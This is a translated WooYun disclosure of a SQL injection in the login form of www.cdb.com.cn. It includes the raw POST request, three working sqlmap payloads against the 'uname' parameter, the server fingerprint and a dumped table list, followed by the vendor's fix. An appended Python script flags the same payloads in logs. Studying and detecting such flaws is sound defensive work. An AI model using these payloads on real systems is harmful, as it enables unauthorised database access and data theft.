WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
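2015-06-25: Details reported to the vendor; awaiting vendor response
2015-06-25: Vendor confirmed; details disclosed to the vendor only
2015-07-05: Details disclosed to core white hats and experts in related fields
2015-07-15: Details disclosed to regular white hats
2015-07-25: Details disclosed to intern white hats
2015-08-09: Details disclosed to the public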
http://www.cdb.com.cn
The main site has a SQL injection vulnerability.
POST /website/cdb/bbs/usercheck.asp HTTP/1.1
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDSQBDBSRA=BBDDKCJALMLLJDBECHGDEPIJ
Host: www.cdb.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=g00dPa%24%24w0rD&Submit422=%b5%c7%20%c2%bc&uname=1
The injectable parameter is uname.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: uname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: password=g00dPa$$w0rD&Submit422=%b5%c7 %c2%bc&uname='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(51)+CHAR(106)+CHAR(122)+CHAR(50)+CHAR(55)+CHAR(67)+CHAR(83)+CHAR(110)) FROM syscolumns)+'' AND 8306=8306 AND 'pVNl'='pVNl

    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: password=g00dPa$$w0rD&Submit422=%b5%c7 %c2%bc&uname=-7710' OR 9487=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9487=9487) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(117)+CHAR(113))) AND 'dRLV'='dRLV

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: password=g00dPa$$w0rD&Submit422=%b5%c7 %c2%bc&uname=-5297' OR 5114=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'UXZu'='UXZu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: cdb
[28 tables]
+----------------------+
| TabAd                |
| TabAdPosition        |
| TabAttrContent       |
| TabColumn            |
| TabCounter           |
| TabExtAttr           |
| TabHomeModule        |
| TabInfoBack          |
| TabManager           |
| TabMember            |
| TabNews              |
| TabOutPro            |
| TabPositionType      |
| TabPushWin           |
| TabTemplate          |
| TabUpFile            |
| TabVote              |
| TabWebInfo           |
| VIEWNews             |
| ViewAd               |
| ViewAdPosition       |
| Web_Ip_address       |
| Web_Stat_Client      |
| Web_Stat_Origin_Page |
| Web_Stat_Site        |
| Web_Stat_View        |
| dtproperties         |
| test                 |
+----------------------+
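It's a bank website, so I didn't dig any deeper~
Severity: Medium
Vulnerability Rank: 9
Confirmed at: 2015-06-25 14:35
Thank you for finding this vulnerability. We have coordinated the relevant business management, development and operations staff to analyze and resolve the issue as soon as possible. Preliminary analysis indicates that the module containing the vulnerability serves no practical purpose, and the module will be taken offline as soon as possible.
2015-06-25: The relevant module has been taken offline.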
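
As an added example (not part of the original report, and not sqlmap's or the vendor's code): a Python log-triage routine that URL-decodes form bodies posted to a login check and flags the three sqlmap technique classes listed in the output above. The regex signatures, function names and sample bodies are assumptions constructed for illustration; the uname values are shortened forms of the payloads quoted in the report.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Heuristic signatures, one per sqlmap technique named in the report.
# Assumption: these patterns are chosen for this example, not a complete rule set.
SIGNATURES = {
    # numeric tautology such as "AND 8306=8306"
    "boolean-based": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),
    # comparison against CONVERT(INT, ...) to force a conversion error
    "error-based": re.compile(r"=\s*convert\s*\(\s*int\s*,", re.I),
    # COUNT(*) over a self cross join of system tables to burn CPU time
    "heavy-query": re.compile(
        r"count\s*\(\s*\*\s*\)\s+from\s+(?:sys\w+\s+as\s+\w+\s*,\s*){2,}", re.I),
}

def classify_body(raw_body):
    """Return {field: [technique, ...]} for a form-encoded request body."""
    hits = {}
    # latin-1 keeps non-UTF-8 bytes (e.g. a GBK-encoded submit button) intact
    for name, value in parse_qsl(raw_body, keep_blank_values=True,
                                 encoding="latin-1"):
        matched = sorted(t for t, rx in SIGNATURES.items() if rx.search(value))
        if matched:
            hits[name] = matched
    return hits

# Constructed sample inputs: shortened forms of the uname payloads in the report.
SAMPLES = {
    "boolean": "'+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+'' AND 8306=8306 AND 'pVNl'='pVNl",
    "error": "-7710' OR 9487=CONVERT(INT,(SELECT CHAR(113)+(SELECT (CASE WHEN (9487=9487) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113))) AND 'dRLV'='dRLV",
    "time": "-5297' OR 5114=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3) AND 'UXZu'='UXZu",
    "benign": "1",
}

def build_body(uname):
    """Encode a body the way a browser would, so '+' and spaces round-trip."""
    return urlencode({"password": "g00dPa$$w0rD", "uname": uname})

def scan_samples():
    return {label: classify_body(build_body(v)) for label, v in SAMPLES.items()}

if __name__ == "__main__":
    for label, result in scan_samples().items():
        print(label, result)
```

Decoding before matching matters here: in a form-encoded body a literal `+` arrives as `%2B` and spaces arrive as `+`, so signatures run against the raw log line would miss the `CHAR(..)+CHAR(..)` chains.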